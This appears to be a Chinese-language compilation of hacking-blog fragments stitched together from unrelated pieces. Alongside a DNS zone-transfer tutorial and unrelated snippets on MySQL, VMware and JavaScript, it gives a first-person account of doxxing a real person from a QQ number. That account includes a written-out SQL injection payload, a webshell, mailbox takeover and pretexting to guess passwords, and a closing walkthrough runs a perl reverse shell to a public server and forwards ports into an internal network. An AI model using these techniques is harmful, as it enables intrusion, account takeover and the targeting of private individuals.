区域传送操作指的是一台后备服务器使用来自主服务器的数据刷新自己的zone数据库。这为运行中的DNS服务提供了一定的冗余度，其目的是为了防止主域名服务器因意外故障变得不可用时影响到全局。一般来说，DNS区域传送操作只在网络里真的有后备域名DNS服务器时才有必要执行，但许多DNS服务器却被错误地配置成只要有人发出请求，就会向对方提供一个zone数据库的拷贝。如果所提供的信息只是与连到因特网上且具备有效主机名的系统相关，那么这种错误配置不一定是坏事，尽管这使得攻击者发现潜在目标要容易得多。真正的问题发生在一个单位没有使用公用/私用DNS机制来分割外部公用DNS信息和内部私用DNS信息的时候，此时内部主机名和IP地址都暴露给了攻击者。把内部IP地址信息提供给因特网上不受信任的用户，就像是把一个单位的内部网络完整蓝图或导航图奉送给了别人。

下面查看几个用于进行区域传送的方法以及从中能获取的信息类型。尽管执行区域传送有多个不同的工具，我们还是只打算讨论其中几种。

使用大多数UNIX和Windows上通常提供的nslookup客户程序是执行区域传送的一个简单办法。我们可以以交互模式使用nslookup：

[bash]$ nslookup

Default Server: ns1.example.net

Address: 10.10.20.2

> 216.182.1.1

Server: ns1.example.net

Address: 10.10.20.2

Name: gate.tellurian.net

Address: 216.182.1.1

> set type=any

> ls -d Tellurian.net. >\> /tmp/zone_out

我们先以交互模式运行nslookup程序。在启动之后，nslookup程序将回显它当前使用的名字服务器，它通常是本单位的本地DNS服务器或者某ISP提供的DNS服务器。因为这个例子里的本地DNS服务器（10.10.20.2）本身无法对目标域里的主机名和IP地址做出权威的解析——我们想要查找的DNS记录没有被全部收录在这台DNS服务器里，所以还需要以手动方式告诉nslookup去查询哪一个DNS服务器。具体到上面的例子，我们使用Tellurian Networks的主DNS服务器（216.182.1.1），这是在早些时候执行域名whois查询时找到该信息的。

接下来，我们把记录类型设置为“any”，这允许你取得任何可能的DNS记录（使用man nslookup命令查看），从而构成一个完整的清单。

最后，我们使用“ls”选项列出所有与目标域名有关的记录，其中“-d”开关用于列出该域名的所有记录。我们在域名后面添了一个点号“.”以强调这是一个完全限定域名，不过大多数情况下不添加也行。另外，我们把输出内容重定向到文件 /tmp/zone_out里去，以便稍后对它操作。

完成区域传送后，查看输出文件，找一找是否存在有助于确认特定系统的让人感兴趣的信息。因为Tellurian Network网站不允许进行区域传送操作，我们这里只能给出一个示例性的输出结果：

[bash]$ more zone_out

acct18   1D IN A 192.168.230.3

        1D IN HINFO "Gateway2000" "WinWKGRPS"

        1D IN MX 0 tellurianadmin-smtp

        1D IN RP bsmith.rci bsmith.who

        1D IN TXT "Location:Telephone Room"

ce        1D IN CNAME aesop

au        1D IN A 192.168.230.4

        1D IN HINFO "Aspect" "MS-DOS"

        1D IN MX 0 andromeda

        1D IN RP jcoy.erebus jcoy.who

        1D IN TXT "Location: Library"

acct21   1D IN A 192.168.230.5

        1D IN HINFO "Gateway2000" "WinWKGRPS"

        1D IN MX 0 tellurianadmin-smtp

        1D IN RP bsmith.rci bsmith.who

        1D IN TXT "Location:Accounting"

我们不打算详细解释每个记录，但将指出若干种重要的类型。在上面的输出清单里，列在右边的每个主机系统名栏都对应一个“A”类型记录，它指出了该系统的IP地址。另外，每台主机都对应一个HINFO记录，标识其平台或所运行的操作系统类型（参见RFC-952）。HINFO记录并非必需，反倒给攻击者提供了不少信息。既然我们已把区域传送的结果保存到一个输出文件中，接着就能很容易地利用grep、sed或awk等UNIX程序或者Perl语言脚本来处理这些结果。

假定我们是SunOS或Solaris专家，可以通过编程找出其HINFO记录带有Sparc、Sun或Solaris等词的IP地址。

[bash]$ grep -i solaris zone_out |wc –l

    388

可以看到，我们有388个引用“Solaris”一词的潜在记录。毫无疑问，我们有大量的目标。

寻找测试系统也是攻击者们偏爱的选择之一。原因很简单：测试系统通常不怎么启动众多的安全特性，口令字往往易于猜到，而且管理员也一般不关心谁登录进来。这确实是个“无照营业者”的完美之家。我们可以如下所示搜索测试系统：

[bash]$ grep -i test /tmp/zone_out |wc-l

    96

可以看出，该区域文件中约有96个含有“test”一词的项。这应该等同于相当数量的实际测试系统。以上只是一些简单的例子。大多数入侵者会分割区域数据以瞄准具有已知脆弱点的特定系统类型。

这里有两点需要注意。首先，前面谈及的方法一次只查询一个名字服务器。这意味着不得不对目标域名的所有权威名字服务器执行完全相同的任务。另外，我们只是查询了Tellurian.net域。如果存在子域，我们又不得不给每个子域（例如greenhouse.Tellurian.net）执行同样类型的查询。其次，你可能会收到一个消息，声称你不能罗列域名数据或者查询被拒绝。这通常表示目标域名服务器已被配置成不允许未经授权的用户执行区域传送。这么一来你不能再从该服务器执行区域传送，不过要是存在多个DNS服务器，你仍有可能找到一个允许区域传送的服务器。

介绍完手动进行DNS查询的方法之后，我们再向大家介绍几个可以自动完成这一查询的工具。这类工具有很多，host、Sam Spade、axfr和dig是其中比较常见的。

1. 在Windows上面，可以用如下方法遍历记录: nslookup 将server指定到对方的dns server 使用命令ls -d domain.com 如果对方没有设定安全的区域传送或者禁用区域传送，这样整个DNS记录将完全暴露出来。 2.在Linux上面，以Redhat为例，可以使用: dig axfr @IP-address domain.com IP-address为对方DNS的Server 这样也可以遍历出对方的记录。

默认为public，可泄漏一些系统，用户和共享信息

private权限就比较大，相对危害也比较大。

验证工具

SNSCAN

MIB

http://hi.baidu.com/rayh4c/blog/item/0214d0c48a8ecad039db498e.html

解决办法

sudo /etc/init.d/mysql restart 重启mysql服务器

那么社工一个我不了解的人,应该怎么做?

信息收集,资源积累------>寻找切入点,技术辅助------>打开突破口,深挖信息------>直接,间接接触,直取目标

1.信息收集,资源积累.

信息收集所指的是由单一的已知信息而引发的垂直信息的获取,比如QQ资料,QQ资料中个人网站和Email等等信息,还有由此而引发的搜索引擎的关键字搜索.

资源积累主要是技术积累,人肉库,0day存储不就是在这个范畴内吗.

本案例中,已知信息为一个QQ号码32XXX3429

通过google搜索得知其EMAIL,个人运营网站,姓名,家庭住址等信息.

2.寻找切入点,技术辅助

通过对其个人运营的IDC网站进行了旁注渗透,拿到个旁注站点的webshell,用的是网趣购物系统后台管理,搜索发现其存在注射漏洞.

admin/review.asp?id=50%20and%201=2%20union%20select%201,2,admin,4,password,6,7,8,9,10,11%20from%20admin

webshell里面标准的虚拟主机设置,非常难提权.

那么切入点在哪?

任何搜索和得到的信息,只要是准确的,必然有关联,翻阅搜索记录的文档,看到目标对应的Email存在的whios信息,发现通过改邮箱注册的一个域名跟我 拿 到webshell在同一个服务器上,虽然webshell很难提权,但是有webshell不就可以查看到目标邮箱注册的域名的后台的数据库,密码的通 用性?这就是个切入点.

3.打开突破口,深挖信息

通过webshell操作,得到后台密码,尝试进入Email,成功.

打开了突破口,下面就看深挖获取更多的信息,将战果扩大化.

翻阅邮箱得到了更多其个人资料和一些于之相关的信息,让我对这个人有了更多的了解.整理手上的资料.

4.直接,间接接触,直取目标

现在考虑直接跟目标接触,因为有之前的资源和信息的储备,所以聊天也有目的性.

首先假装跟其买空间,然后很顺利的跟他扯上老乡的关系(储备信息中得到过其个人详细资料),然后跟他有扯上高中校友,因为之前做过功课,连他读的高中的位置在哪里,哪个老师都做过记录,所以聊起来很顺利.很快就获得了他的信任.

沟通是间断的,为了就是避免引起怀疑.

过了2-3天,借着业务需求又跟他聊上了.

我:你是哪个星座的呀.

目标:巨蟹座阿

我:我靠,我也是巨蟹座的.你巨蟹座哪一天阿...

目标:28号阿

我:哈哈,那你小一点阿..

.......

顺利拿到其生日,通过姓名和生日,手机组合,拿到目标各种密码.

当然上面说的只是一种套信息的思路,更多思路要靠个人积累和思考,始终要明白一点,别人在明,你在暗,个人操作的空间很大.

沟通也是一门艺术,把目标当朋友,只有在角色中,看戏和演戏的人才能逼真.

抛砖引玉,亦做总结和思考.

简单的说，A是一个dz论坛，很久没人管，拿到了A的webshell，想进入B，发现B也有dz，不过B的dz的数据量比较大，一筹莫展的时候，想起来，可以在B上查看哪些是管理员，然后在A的数据库里面查询密码，管理员弱小的失误，用安全防护的角度来看

1.对于企业来说，废弃业务要及时关闭，或者设置权限，不让任意访问

2.管理员的密码意识

3.不同的业务的帐号不能具有通用性，比如A上是coldfire，B上也是coldfire。越特别越容易引起人的注意

首先排除了防火墙的原因，在虚拟机里面用nc监听了任意一个端口，然后本机telnet是可行了。（开始我启用的是桥接模式）

后来怒了，启用NAT总可以吧，然后NAT死活自动分配不到ip，更怒了。。。

逼着我自己手工去分配NAT模式的ip这个总可以吧。然后想了想，NAT模式的ip怎么分配来着。。。

启用一个正常的虚拟机，然后启用NAT模式，看它的ip怎么分配的，然后依着葫芦画瓢终于搞定了。

搞完了以后想了下 其实自己只是在解决问题，为什么ip是这么分配的，这几个模式之间的区别应该在原理上了解，而不是在应用层面上去区分。

以后搞东西的时候多想想

问题解决的方法是：

手动修改ip：

192.168.xxx.xxx（vmware中网卡的ip的c段）

255.255.255.0

192.168.xxx.2

记一笔，对于模式的区别，后续查看资料以后补一篇日志，测试东西去。

这两种方法会忽略文档的结构。假如您希望查找文 档 中所有的 <p> 元素，getElementsByTagName() 会把它们全部找到，不管 <p> 元素处于文档中的哪个层次。同时，getElementById() 方法也会返回正确的元素，不论它被隐藏在文档结构中的什么位置。

document.getElementById("ID");

document.getElementsByTagName("标签名称");

环境:

被攻陷的Linux主机(拿到root权限)-----模拟为我内网的一台Linux服务器 192.168.0.105

hack的操作用机-----我的电脑 192.168.1.101

反弹到公网的服务器-----我自己的公网服务器 61.160.2xx.xxx

渗透测试用的windows测试机  192.168.1.109

工具:

packetr-static  Linux下的

htran.exe   windows下的

sockcap 用作代理进入内网渗透的利器

过程:

1.我模拟下极度苛刻的情况下的环境,该攻陷的Linux服务器对外不开放22,只存在web端口80,那么我们必须得反弹shell到公网的机器上,这点我虚拟机里面没 这个环境,我就直接说下简要的

上传back.pl文件到linux下的tmp目录下,执行

perl /tmp/back.pl xxx.xxx.xxx.xxx 端口

在公网的服务器上,运行nc执行

nc -l -v -p 端口(跟上面的一样)

现在我弹2个窗口回来,一个开代理,一个转发数据

把packetr-static传上去,执行

./packetr-static -s 1988

一个窗口转发数据,执行

./packetr-static -slave 61.160.20x.xxx 123 127.0.0.1 1988

2.在windows公网端执行,

htran.exe -p -listen 123 1988

3.配置sockcap

4.运行代理程序进入内网